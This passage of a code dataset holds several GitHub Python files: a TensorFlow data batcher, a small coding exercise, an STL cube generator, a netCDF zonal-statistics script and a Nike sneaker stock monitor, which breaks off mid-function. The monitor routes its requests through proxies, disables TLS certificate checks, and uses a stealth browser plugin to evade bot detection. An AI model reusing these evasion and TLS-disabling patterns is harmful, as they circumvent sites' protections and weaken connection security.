\"img_mask\":img_mask,\n \"url_hash\" : url_hash\n }\n\n if params.mode == \"train\":\n output[\"sim_img_feature\"] = 
sim_img_feature\n output[\"dissim_img_feature\"] = dissim_img_feature\n if \"SIMPAD\" in params.experiment and img_num < params.max_img_num:\n sim_padded_img_feature = tf.concat([img_feature,sim_img_feature[:(params.max_img_num - img_num),:]],axis = 0)\n output[\"img_feature\"] = sim_padded_img_feature\n yield output\n else:\n for _ in range(batch_size):\n yield output\n \n\n\n\n\ndef batch_generator(generator,raw_dataset,params,vocab,batch_size):\n output_types_dict = {\n \"enc_len\": tf.int32,\n \"enc_input\": tf.int32,\n \"enc_input_extend_vocab\": tf.int32,\n \"enc_mask\":tf.float32,\n \"article_oovs\": tf.string,\n \"dec_input\": tf.int32,\n \"target\": tf.int32,\n \"dec_len\": tf.int32,\n \"dec_mask\": tf.float32,\n \"article\": tf.string,\n \"abstract\": tf.string,\n \"abstract_sents\": tf.string,\n \"img_feature\": tf.float32,\n \"img_num\":tf.int32,\n \"img_mask\":tf.float32,\n \"url_hash\" : tf.string\n }\n \n if params.mode == \"train\":\n output_types_dict[\"sim_img_feature\"] = tf.float32\n output_types_dict[\"dissim_img_feature\"] = tf.float32\n \n dataset = tf.data.Dataset.from_generator(\n lambda: generator(raw_dataset,params,vocab,batch_size),\n output_types = output_types_dict)\n \n img_feature_dim=params.img_embed_dim\n padded_shapes_dict = {\"enc_len\": [],\n \"enc_input\": [None],\n \"enc_input_extend_vocab\": [None],\n \"enc_mask\":[None],\n \"article_oovs\": [None],\n \"dec_input\": [params.max_dec_steps],\n \"target\": [params.max_dec_steps],\n \"dec_len\": [],\n \"dec_mask\":[params.max_dec_steps],\n \"article\": [],\n \"abstract\": [],\n \"abstract_sents\": [None],\n \"img_feature\":[None,img_feature_dim],\n \"img_num\":[],\n \"img_mask\":[None],\n \"url_hash\" : []\n }\n padding_values_dict = {\"enc_len\": -1,\n \"enc_input\": vocab.word2id(data.PAD_TOKEN),\n \"enc_input_extend_vocab\": vocab.word2id(data.PAD_TOKEN),\n \"enc_mask\":0.0,\n \"article_oovs\": b'',\n \"dec_input\": vocab.word2id(data.PAD_TOKEN),\n \"target\": vocab.word2id(data.PAD_TOKEN),\n \"dec_len\": -1,\n \"dec_mask\":0.0,\n \"article\": b\"\",\n \"abstract\": b\"\",\n \"abstract_sents\": b'',\n \"img_feature\":0.0,\n \"img_num\":-1,\n \"img_mask\":0.0,\n \"url_hash\" : b\"\"\n }\n \n if params.mode == \"train\":\n padded_shapes_dict[\"sim_img_feature\"] = [None,img_feature_dim]\n padded_shapes_dict[\"dissim_img_feature\"] = [None,img_feature_dim]\n padding_values_dict[\"sim_img_feature\"] = 0.0\n padding_values_dict[\"dissim_img_feature\"] = 0.0\n \n dataset = dataset.padded_batch(batch_size, padded_shapes=(padded_shapes_dict),\n padding_values=padding_values_dict,\n drop_remainder=True)\n def update(record):\n encoder_input_dict = {\"enc_input\": record[\"enc_input\"],\n \"extended_enc_input\": record[\"enc_input_extend_vocab\"],\n \"article_oovs\": record[\"article_oovs\"],\n \"enc_len\": record[\"enc_len\"],\n \"enc_mask\":record[\"enc_mask\"],\n \"article\": record[\"article\"],\n \"max_oov_len\": tf.shape(record[\"article_oovs\"])[1],\n \"img_feature\":record[\"img_feature\"],\n \"img_num\":record[\"img_num\"],\n \"img_mask\":record[\"img_mask\"],\n \"url_hash\" : record[\"url_hash\"]\n }\n decoder_input_dict ={\"dec_input\": record[\"dec_input\"],\n \"dec_target\": record[\"target\"],\n \"dec_len\": record[\"dec_len\"],\n \"dec_mask\":record[\"dec_mask\"],\n \"abstract_sents\" : record[\"abstract_sents\"],\n \"abstract\": record[\"abstract\"]}\n if params.mode == \"train\":\n encoder_input_dict[\"sim_img_feature\"] = record[\"sim_img_feature\"]\n encoder_input_dict[\"dissim_img_feature\"] 
= record[\"dissim_img_feature\"]\n if \"SIMPAD\" in params.experiment or \"TS\" in params.experiment:\n #In SIMPAD all the images needs to be considered and no masking is done during attention computation\n #Since original images are not considered in \"DSC_MSMO-TS\" so we consider all similar/dissimilar images\n batch_max_img_num = params.max_img_num\n else:\n batch_max_img_num = tf.reduce_max(record[\"img_num\"])\n sim_ones = tf.ones([params.batch_size,batch_max_img_num], dtype = tf.int32)\n dissim_zeros = tf.zeros([params.batch_size,batch_max_img_num],dtype=tf.int32)\n decoder_input_dict[\"dsc_target\"] = tf.concat([sim_ones, dissim_zeros], axis = -1)\n \n return (encoder_input_dict, decoder_input_dict)\n \n AUTOTUNE = tf.data.experimental.AUTOTUNE\n dataset = dataset.map(update, num_parallel_calls=AUTOTUNE)\n return dataset\n\n\n\nclass batcher:\n def __init__(self,data_path, img_feature_path,sim_img_feature_path, dissim_img_feature_path, vocab):\n self.data_path=data_path\n self.img_feature_path=img_feature_path\n self.sim_img_feature_path = sim_img_feature_path\n self.dissim_img_feature_path = dissim_img_feature_path\n self.vocab=vocab\n \n def get_batched_dataset(self,params,batch_size, logger):\n '''Returns Batched dataset as per batch size and other parameters'''\n if params.mode == \"train\":\n raw_dataset = tf.data.Dataset.from_generator(lambda: raw_record_generator(self.data_path, self.img_feature_path, logger, self.sim_img_feature_path, self.dissim_img_feature_path),\n output_types=(tf.string, tf.string,tf.string,tf.float32, tf.float32, tf.float32))\n else:\n raw_dataset = tf.data.Dataset.from_generator(lambda: raw_record_generator(self.data_path, self.img_feature_path),\n output_types=(tf.string, tf.string,tf.string,tf.float32))\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n # raw_dataset= raw_dataset.cache().prefetch(buffer_size=AUTOTUNE)\n if not params.single_pass:\n # We repeat and shuffle the dataset only during train mode\n raw_dataset=raw_dataset.shuffle(1000, reshuffle_each_iteration=True).repeat()\n dataset=batch_generator(example_generator,raw_dataset,params,self.vocab,batch_size)\n dataset=dataset.prefetch(buffer_size=AUTOTUNE)\n return dataset\n","repo_name":"mailsourajit25/Topic-Aware-Multimodal-Summarization","sub_path":"batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":15444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"32914716569","text":"# 코딩은 체육과목 입니다\n\nnum = int(input())\n\nif (num % 4 == 0) :\n N = int(num / 4)\n for i in range(N) :\n print(\"long\", end = \" \")\n print(\"int\")\nelse :\n print(\"N은 4의 배수여야 한다.\")","repo_name":"arinming/CodingTest","sub_path":"Python/백준/Step3/25314.py","file_name":"25314.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8176309113","text":"import numpy as np\nfrom stl import mesh\n\ndef create_cube(origin, dimensions):\n vertices = np.array([\n [0, 0, 0],\n [1, 0, 0],\n [1, 1, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 1, 1]], dtype=np.float64)\n\n vertices *= dimensions\n vertices += origin\n\n faces = np.array([\n [0,3,1],\n [1,3,2],\n [0,4,7],\n [0,7,3],\n [4,5,6],\n [4,6,7],\n [5,1,2],\n [5,2,6],\n [2,3,6],\n [3,7,6],\n [0,1,5],\n [0,5,4]])\n\n cube = mesh.Mesh(np.zeros(faces.shape[0], dtype=mesh.Mesh.dtype))\n for i, f in enumerate(faces):\n for j in range(3):\n cube.vectors[i][j] = vertices[f[j],:]\n\n return cube\n","repo_name":"Zeddi92/nuclide_chart_print","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10747717857","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom rasterstats import zonal_stats\nfrom netCDF4 import Dataset, num2date,date2num\nfrom joblib import Parallel, delayed\nfrom datetime import datetime\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ntry:\n ddirDB = getattr(settings, \"DIRDB\", None)\nexcept ImproperlyConfigured:\n ddirDB = os.path.expanduser('~') + \"/Bureau/teledm/donnees\"\n\n\n\ndef calc_stats(rx,ry,gdf,ndist,trsfm,tps):\n # fonction calculant les stats à partir de la géodatabase(gdf). rx,ry = reso spatiale, ndist=nb de districts, trsfm=géométrie de la matrice de la variable, tps=matrice des dates\n # matrices vides aux dimensions du \"bloc temporel\" (len(tps) correspond à l'axe 0 de la mat tps) et du nombre de districts/aires/pays (ndist)\n nb_px = np.zeros((len(tps),ndist))\n nb_px[:] = np.nan\n v_max = np.zeros((len(tps),ndist))\n v_max[:] = np.nan\n v_mean = np.zeros((len(tps),ndist))\n v_mean[:] = np.nan\n v_med = np.zeros((len(tps),ndist))\n v_med[:] = np.nan\n v_min = np.zeros((len(tps),ndist))\n v_min[:] = np.nan\n v_std = np.zeros((len(tps),ndist))\n v_std[:] = np.nan\n for i in range(len(tps)):\n # \"micro-pixelisation\" pour obtenir une pseudo-résolution plus fine, adéquate au découpage district/aire\n var1 = np.repeat(tps[i,...],100*ry, axis=0)\n var2 = np.repeat(var1,100*rx, axis=1)\n val_input=np.ma.masked_array(var2, np.isnan(var2))\n stats = zonal_stats(gdf['geometry'],val_input, transform=trsfm, stats=['min', 'max', 'mean', 'count', 'std', 'median'])#fonction stat du module rasterstats\n df = gdf.join(pd.DataFrame(stats))# chargement des stats dans la geodataframe\n # argement des stats dans les différentes matrices\n nb_px[i,:] = np.array(df['count'].ix[:])\n v_max[i,:] = np.array(df['max'].ix[:])\n v_mean[i,:] = np.array(df['mean'].ix[:])\n v_med[i,:] = np.array(df['median'].ix[:])\n v_min[i,:] = np.array(df['min'].ix[:])\n v_std[i,:] = np.array(df['std'].ix[:])\n return nb_px,v_max,v_mean,v_med,v_min,v_std\n\n\n\n\ndef calc_moy(ncfile,fshape,deb,fin,sat,varname,level):\n # traitement des dates\n datedeb = datetime.strptime(deb,\"%Y-%m-%d\")\n datefin = datetime.strptime(fin,\"%Y-%m-%d\")\n \n \n geodf = gpd.GeoDataFrame.from_file(fshape)\n \n nbdist = len(geodf[geodf.columns[1]]) # nombre de districts/aires \n\n nbpx_tmp = []\n vmin_tmp = []\n vmax_tmp = []\n vmean_tmp = []\n vstd_tmp = []\n vmed_tmp = []\n nc = Dataset(ncfile, 'r')\n var_in = nc.variables[varname]\n dates = nc.variables['time']\n # definition des dates de début et fin en format numérique, à partir de l'unité de temps du .nc\n ndatedeb = date2num(datedeb,dates.units)\n ndatefin = date2num(datefin,dates.units)\n if datetime.strftime(num2date(dates[0],dates.units),\"%H\") != \"0\": # condition qui vérifie l'heure de la donnée(0h, 3h,6h,...)\n ndatedeb += 24-int(datetime.strftime(num2date(dates[0],dates.units),\"%H\"))\n ndatefin += 24-int(datetime.strftime(num2date(dates[0],dates.units),\"%H\"))\n # détermination des indices des dates debut et fin dans la matrice\n iddeb = np.abs(dates[:]-ndatedeb).argmin()\n idfin = np.abs(dates[:]-ndatefin).argmin()-1\n # extraction du bloc de dates et ajout à la variable time(tp) du newnc\n serie_dates = dates[iddeb:idfin+1]\n\n if level == -1:\n var = np.array(var_in[iddeb:idfin+1,...])\n else:\n var = np.array(var_in[iddeb:idfin+1,level,...])\n # traitement de 
la matrice avec fillvalue, scalefactor et addoffset\n if sat == 'toms':\n var[var==var_in._FillValue]=-999\n else:\n \tvar[var==var_in._FillValue]=np.nan\n if \"scale_factor\" in var_in.ncattrs():\n var = (var[:]-var_in.add_offset)*var_in.scale_factor\n # définition des caractéristiques géographiques transform,resolution spatiale, lat max et lon min\n lat = nc.variables['latitude'][:]\n lon = nc.variables['longitude'][:]\n xo = min(lon)\n yo = max(lat)\n resx = np.abs(np.mean(np.diff(lon)))\n resy = np.abs(np.mean(np.diff(lat)))\n transform = [xo, 0.01, 0.0, yo, 0.0, -0.01]\n\n #############################################################################################################\n #############################################################################################################\n idt = len(serie_dates)//8\n if idt == 0:\n idt = 1\n ndt = range(0,len(serie_dates),idt)\n nb_mat_in = [var[ix:ix+(idt),...] for ix in ndt]# decoupage de la matrice en blocs de 26 jours\n res = Parallel(n_jobs=-1)(delayed(calc_stats)(resx,resy,geodf,nbdist,transform,temps_x) for temps_x in nb_mat_in)# appel de la fonction calc_stats avec parallélisation\n # chargement des calculs dans les variables temporaires\n nbpx_tmp.append(np.concatenate([res[n][0] for n in range(0,len(ndt))], axis=0))\n vmax_tmp.append(np.concatenate([res[n][1] for n in range(0,len(ndt))], axis=0))\n vmean_tmp.append(np.concatenate([res[n][2] for n in range(0,len(ndt))], axis=0))\n vmed_tmp.append(np.concatenate([res[n][3] for n in range(0,len(ndt))], axis=0))\n vmin_tmp.append(np.concatenate([res[n][4] for n in range(0,len(ndt))], axis=0))\n vstd_tmp.append(np.concatenate([res[n][5] for n in range(0,len(ndt))], axis=0))\n\n \n index = [num2date(d,dates.units).date() for d in serie_dates]\n columns_name = geodf.name.values.tolist()\n tmpvar_dict = {\"nbpx\":nbpx_tmp,\"vmax\":vmax_tmp,\"vmean\":vmean_tmp,\"vmin\":vmin_tmp,\"vstd\":vstd_tmp}\n list_df = {}\n for n in tmpvar_dict:\n list_df[n] = pd.DataFrame (np.concatenate([tmpvar_dict[n][d_t] for d_t in range(0,len(tmpvar_dict[n]))], axis=0), index=index, columns=columns_name).round(4)\n #df.to_csv(ddirout+'/'+output[:-3]+'_'+n+'.csv', header=True)\n nc.close()\n return list_df\n\nif __name__ == \"__main__\":\n \n ddirout = os.path.join(os.path.expanduser('~'), \"dev/crc/teledm/tmp\")\n deb = \"2007-01-01\" #\"1979\" a ...\n fin = \"2007-01-15\"\n pays = \"burkina\" #\"burkina\",\"mali\",\"niger\",\"senegal\"\n niveau = \"district\" #\"pays\",\"district\",\"aire\"\n types = \"satellite\" #\"satellite\",\"re_analyse\"\n sat = \"modis\" #\"modis\",\"aura_omi\",\"ecmwf\",\"msg\"\n prod = \"MYD07\" #\"MYD04\",\"MYD05\",\"MYD07\",\"omaeruv\",\"seviri_aerus\",\"macc\",\"era_interim\"\n res_temp = \"w\" #\"d\",\"w\",\"m\",\"t\"\n res = \"res009\" #\"003\",\"005\",\"009\",\"025\",\"075\",\"125\"\n varname = 'Total_Ozone'\n shape = \"merge2500\" # \"all_fs\" \"merge1500\" \"merge2500\"\n \n ldf = calc_moy(ddirout,deb,fin,pays,niveau,types,sat,prod,res_temp,res,varname,shape)\n","repo_name":"jsdelivrbot/web1","sub_path":"teledm/moy_dist_parallel1.py","file_name":"moy_dist_parallel1.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17578994292","text":"# For regions that do not use the standard API\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport traceback\n\nimport asyncio\nfrom pyppeteer import launch\nfrom pyppeteer_stealth import stealth\n\n___standard_api___ = [\n 'GB', 'US', 'AU', 'AT', 'BE', 'BG', 'CA', 'CN', 'HR', 'CZ', 'DK', 'EG', \n 'FI', 'FR', 'DE', 'HU', 'IN', 'ID', 'IE', 'IT', 'MY', 'MX', 'MA', 'NL', \n 'NZ', 'NO', 'PH', 'PL', 'PT', 'PR', 'RO', 'RU', 'SA', 'SG', 'SI', 'ZA', \n 'ES', 'SE', 'CH', 'TR', 'AE', 'VN', 'JP' \n]\n\n\nasync def get_content(url, user_agent, proxy):\n browser = await launch()\n page = await browser.newPage()\n await stealth(page)\n await page.emulate({\n 'userAgent': user_agent,\n 'viewport': {\n 'width': 414,\n 'height': 736,\n 'deviceScaleFactor': 3,\n 'isMobile': True,\n 'hasTouch': True,\n 'isLandscape': False\n }\n })\n await page.goto(url)\n content = await page.content()\n await page.close()\n return content\n\n\ndef standard_api(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n headers = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-GB,en;q=0.9',\n 'appid': 'com.nike.commerce.snkrs.web',\n 'content-type': 'application/json; charset=UTF-8',\n 'dnt': '1',\n 'nike-api-caller-id': 'nike:snkrs:web:1.0',\n 'origin': 'https://www.nike.com',\n 'referer': 'https://www.nike.com/',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-site',\n 'user-agent': user_agent,\n 'Cache-Control': 'no-cache, no-store, must-revalidate',\n 'Pragma': 'no-cache',\n 'Expires': '0'\n }\n to_discord = []\n\n anchor = 0\n while anchor < 160:\n url = f'https://api.nike.com/product_feed/threads/v3/?anchor={anchor}&count=50&filter=marketplace%28{LOCATION}%29&filter=language%28{LANGUAGE}%29&filter=channelId%28010794e5-35fe-4e32-aaff-cd2c74f89d61%29&filter=exclusiveAccess%28true%2Cfalse%29'\n html = requests.get(url=url, timeout=20, verify=False, headers=headers, proxies=proxy)\n output = json.loads(html.text)\n\n # Stores details in array\n for item in output['objects']:\n try:\n for product in item['productInfo']:\n if (product['availability']['available'] == True) and (product['merchProduct']['status'] == 'ACTIVE'):\n if KEYWORDS == []:\n first = 0\n sizes = ''\n for k in product['availableGtins']:\n stored = [product['productContent']['fullTitle'], product['productContent']['colorDescription'], k['gtin']]\n if k['available'] == True:\n if stored in ITEMS:\n pass\n else:\n ITEMS.append(stored)\n \n for s in product['skus']:\n if first == 0:\n if s['gtin'] == k['gtin']:\n sizes = str(s['nikeSize']) + ': ' + str(k['level'])\n first = 1\n break\n else:\n if s['gtin'] == k['gtin']:\n sizes += '\\n' + str(s['nikeSize']) + ': ' + str(k['level'])\n break\n else:\n if stored in ITEMS:\n ITEMS.remove(stored)\n \n if sizes != '' and start == 0:\n print('Sending notification to Discord...')\n to_discord.append(dict(\n title=product['productContent']['fullTitle'],\n description=product['productContent']['colorDescription'],\n url='https://www.nike.com/' + LOCATION + '/launch/t/' + product['productContent']['slug'],\n thumbnail=item['publishedContent']['nodes'][0]['nodes'][0]['properties']['squarishURL'],\n price=str(product['merchPrice']['currentPrice']),\n style_code=str(product['merchProduct']['styleColor']),\n sizes=sizes))\n\n else:\n for key in KEYWORDS:\n if key.lower() in product['merchProduct']['labelName'].lower() or key.lower() in product['productContent']['colorDescription'].lower():\n 
first = 0\n sizes = ''\n for k in product['availableGtins']:\n stored = [product['productContent']['fullTitle'], product['productContent']['colorDescription'], k['gtin']]\n if k['available'] == True:\n if stored in ITEMS:\n pass\n else:\n ITEMS.append(stored)\n \n for s in product['skus']:\n if first == 0:\n if s['gtin'] == k['gtin']:\n sizes = str(s['nikeSize']) + ': ' + str(k['level'])\n first = 1\n break\n else:\n if s['gtin'] == k['gtin']:\n sizes += '\\n' + str(s['nikeSize']) + ': ' + str(k['level'])\n break\n else:\n if stored in ITEMS:\n ITEMS.remove(stored)\n \n if sizes != '' and start == 0:\n print('Sending notification to Discord...')\n to_discord.append(dict(\n title=product['productContent']['fullTitle'],\n description=product['productContent']['colorDescription'],\n url='https://www.nike.com/' + LOCATION + '/launch/t/' + product['productContent']['slug'],\n thumbnail=item['publishedContent']['nodes'][0]['nodes'][0]['properties']['squarishURL'],\n price=str(product['merchPrice']['currentPrice']),\n style_code=str(product['merchProduct']['styleColor']),\n sizes=sizes))\n except KeyError:\n pass\n\n except:\n print(traceback.format_exc())\n\n anchor += 50\n \n return to_discord\n\n \ndef brazil(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n # need to bs4 \n url = 'https://www.nike.com.br/Snkrs/Feed?p=2&demanda=true'\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'none',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': user_agent,\n 'Cache-Control': 'no-cache, no-store, must-revalidate',\n 'Pragma': 'no-cache',\n 'Expires': '0'\n }\n to_discord = []\n html = requests.get(url=url, headers=headers, proxies=proxy)\n soup = BeautifulSoup(html.text, 'html.parser')\n output = soup.find_all('div', {'class': 'produto produto--esgotado'})\n for product in output:\n if KEYWORDS == []:\n item = dict(\n title=product.find('h2', {'class': 'produto__detalhe-titulo'}).text,\n description=None,\n url=product.find('div', {'class': 'produto__imagem'})['href'],\n thumbnail=product.find('div', {'class': 'produto__imagem'})['src'],\n price=None,\n style_code=None,\n sizes=None\n )\n\n if item in ITEMS:\n pass\n elif start == 0:\n to_discord.append(item)\n start = 1\n \n else:\n for key in KEYWORDS:\n if key.lower() in product.find('h2', {'class': 'produto__detalhe-titulo'}).text.lower():\n item = dict(\n title=product.find('h2', {'class': 'produto__detalhe-titulo'}).text,\n description=None,\n url=product.find('div', {'class': 'produto__imagem'})['href'],\n thumbnail=product.find('div', {'class': 'produto__imagem'})['src'],\n price=None,\n style_code=None,\n sizes=None\n )\n\n if item in ITEMS:\n pass\n elif start == 0:\n to_discord.append(item)\n start = 1\n\n return to_discord\n\n\n\ndef chile(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n url = 'https://www.nike.cl/api/catalog_system/pub/products/search?&_from=0&_to=49'\n to_discord = []\n html = asyncio.get_event_loop().run_until_complete(get_content(url, user_agent, proxy))\n html = html.replace('